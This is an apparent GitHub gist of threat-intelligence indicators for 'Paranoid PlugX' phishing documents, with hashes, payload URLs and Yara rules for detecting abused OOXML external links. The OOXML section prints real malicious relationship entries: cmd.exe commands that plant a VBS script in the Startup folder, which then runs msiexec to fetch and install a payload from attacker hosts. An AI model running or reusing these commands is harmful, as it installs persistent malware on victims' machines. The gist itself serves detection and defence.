Skip to content

Instantly share code, notes, and snippets.

@edeca
Last active September 14, 2017 05:38
Show Gist options
  • Save edeca/01f5e35d7de074cdd6710caddd973965 to your computer and use it in GitHub Desktop.
Save edeca/01f5e35d7de074cdd6710caddd973965 to your computer and use it in GitHub Desktop.
List of additional Paranoid PlugX indicators

Paranoid PlugX

This gist contains brief details of additional "Paranoid PlugX" files, likely associated with a sophisticated attacker. NCC Group is monitoring a number of OOXML and RTF techniques our red team has been using since September 2016, which uncovered multiple malicious documents from around August 2017.

For the original Paranoid PlugX article, please see: https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/ (h/t Palo and @tlansec).

Documents

A few documents can be found which use 203.248.116.182 to obtain further malicious content.

OOXML

Two Powerpoint presentations abuse OOXML references. The content simply says:

Please Enable Your Adobe Flash Player Settings...

Both documents attempt to start cmd.exe, pulling an additional payload from either youthservicesballarat.com.au or 203.248.116.182.

The relevant part of each document, after basic deobfuscation, is shown below.

<Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="cmd.exe /c echo sET WS = CrateObject("wScript.ShEll")  > %AppData%/Microsoft/Windows/"Start Menu"/Programs/Startup/Programs.vbs&amp;echo ws.run "cmd.exe /c msiexec /q /i http://youthservicesballarat.com.au/images/kubrickhead.jpg",vbhide>>%AppData%/Microsoft/Windows/"Start <http://youthservicesballarat.com.au/images/kubrickhead.jpg",vbhide>>%AppData%/Microsoft/Windows/"Start>  Menu"/Programs/Startup/Programs.vbs&amp;%AppData%/Microsoft/Windows/"Start Menu"/Programs/Startup/Programs.vbs " TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="cmd.exe /c echo Set ws = CreateObject("Wscript.Shell")  > %AppData%/Microsoft/Windows/"Start Menu"/Programs/Startup/Programs.vbs&amp;echo ws.run "cmd.exe /c msiexec.exe /q /i http://203.248.116.182/images/a00.gif",vbhide>>%AppData%/Microsoft/Windows/"Start <http://203.248.116.182/images/a00.gif",vbhide>>%AppData%/Microsoft/Windows/"Start>  Menu"/Programs/Startup/Programs.vbs&amp;%AppData%/Microsoft/Windows/"Start Menu"/Programs/Startup/Programs.vbs" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="cmd.exe /c echo Set ws = CreateObject("Wscript.Shell")>%AppData%/Microsoft/Windows/"Start Menu"/Programs/Startup/Programs.vbs&amp;echo ws.run "cmd.exe /c msiexec /q /i http://youthservicesballarat.com.au/images/kubrickhead.jpg",vbhide>>%AppData%/Microsoft/Windows/"Start <http://youthservicesballarat.com.au/images/kubrickhead.jpg",vbhide>>%AppData%/Microsoft/Windows/"Start>  Menu"/Programs/Startup/Programs.vbs&amp;%AppData%/Microsoft/Windows/"Start Menu"/Programs/Startup/Programs.vbs " TargetMode="External"/>

Second document:

<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="cmd.exe /c echo Set ws = CreateObject("Wscript.Shell")>%AppData%/Microsoft/Windows/"Start Menu"/Programs/Startup/Thumbs.vbs&amp;echo ws.run "cmd.exe /c msiexec /q /i http://203.248.116.182/images/Thumbs.bmp",vbhide>>%AppData%/Microsoft/Windows/"Start <http://203.248.116.182/images/Thumbs.bmp%22,vbhide%3e%3e%25AppData%25/Microsoft/Windows/%22Start>  Menu"/Programs/Startup/Thumbs.vbs&amp;%AppData%/Microsoft/Windows/"Start Menu"/Programs/Startup/Thumbs.vbs " TargetMode="External"/>

RTF

Two files abuse CVE-2017-0199. The content is in Japanese and relates to ANA, an airline. The embedded OLE content is identical in both, but one version also has the HTA name in the RTF \objclass element.

The payload URL for both is: http://203.248.116.182/images/opt.hta

Hashes

  • b26da51a70618b68a479e21bce499c20d4b280d7c79aa6b054da82c747ccfba1 - OOXML, Powerpoint Presentation, abuses external references to download payload from 203.248.116.182 and youthservicesballarat.com.au
  • e7931270a89035125e6e6655c04fee00798c4c2d15846947e41df6bba36c75ae - OOXML, Powerpoint Presentation, abuses external references to download payload from 203.248.116.182
  • 9704d9f8e1162f8cb367f1b49bf95d9c117e2eb1a7dbb98e3cd01a5c0361c889 - RTF, uses CVE-2017-0199 to download payload HTA from 203.248.116.182
  • 5c7b319d66d11f6a579bcf24a099e1788f6981a9aad8ca5cb1440f72a4366ea2 - RTF, uses CVE-2017-0199 to download payload HTA from 203.248.116.182
  • ea13ef8cb5f227080ebf65daa6644f66807aa8f06dce2155d40de556367221ee - MSIL (.Net) executable, first stage
  • fabcee5f4bab02700375db8a6b1e6a04372f19a4af98d2652ddcc15915374e02 - MSIL (.Net) executable, first stage
  • a3e8ecf21d2a8046d385160ca7e291390e3c962a7107b06d338c357002d2c2d9 - MSIL (.Net) executable, first stage
  • 104198af709201ba99e41691ca5f2b7025758660be51c7f425fdf1968fde2580 - MSIL (.Net) executable, first stage
  • 0d3b7f04bb3b421f89e0b305f206f688f2c87b47ce341cdb87422c8978f2a869 - MSIL (.Net) executable, first stage

Yara rule

The following Yara rules can help detect abuse of OOXML external links. Note this is a legitimate "feature" of Word and many non-malicious documents use it.

Please also note there are lots of other executables which can run external code. cmd, powershell and regsvr are listed as obvious examples. A complete list is beyond the scope of this gist :)

rule exploit_Office_ExternalLinks : no_vt {
  meta:
    author = "David Cannings"
    description = "Generic rule to detect OOXML documents with potential RCE"
    
  strings:
    // Note: As with all OOXML documents the PKZIP container needs
    //       expanding before this will hit.
    $str01 = "relationships/hyperlink" wide ascii nocase
    $str02 = /TargetMode=["']?External/ wide ascii nocase
  
    // No backreferences in Yara regular expressions, so cover a 
    // few edge cases with multiple rules.
  
    // Catch any references to suspicious filetypes
    // See: https://support.microsoft.com/en-us/kb/291369
    $target_01 = /Target=["']?[a-z0-9_.-]{1,32}\.(exe|dll|msi|cab|ps1|inf|sct|ws|cpl|vb|bat|lnk|reg|scr|url)/ wide ascii nocase
  
  condition:
    all of ($str*) and any of ($target*)
}

rule exploit_Office_ExternalLinks_Suspicious {
  meta:
    author = "David Cannings"
    description = "Generic rule to detect OOXML documents with potential RCE"
    
  strings:
    // Note: As with all OOXML documents the PKZIP container needs
    //       expanding before this will hit.
    $str01 = "relationships/hyperlink" wide ascii nocase
    $str02 = /TargetMode=["']?External/ wide ascii nocase
    
    // Catch references that lack the file extension
    $target_01 = /Target=["']?(cmd|powershell|ftp[^:]|regsvr)/ wide ascii nocase
  
  condition:
    all of ($str*) and any of ($target*)
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment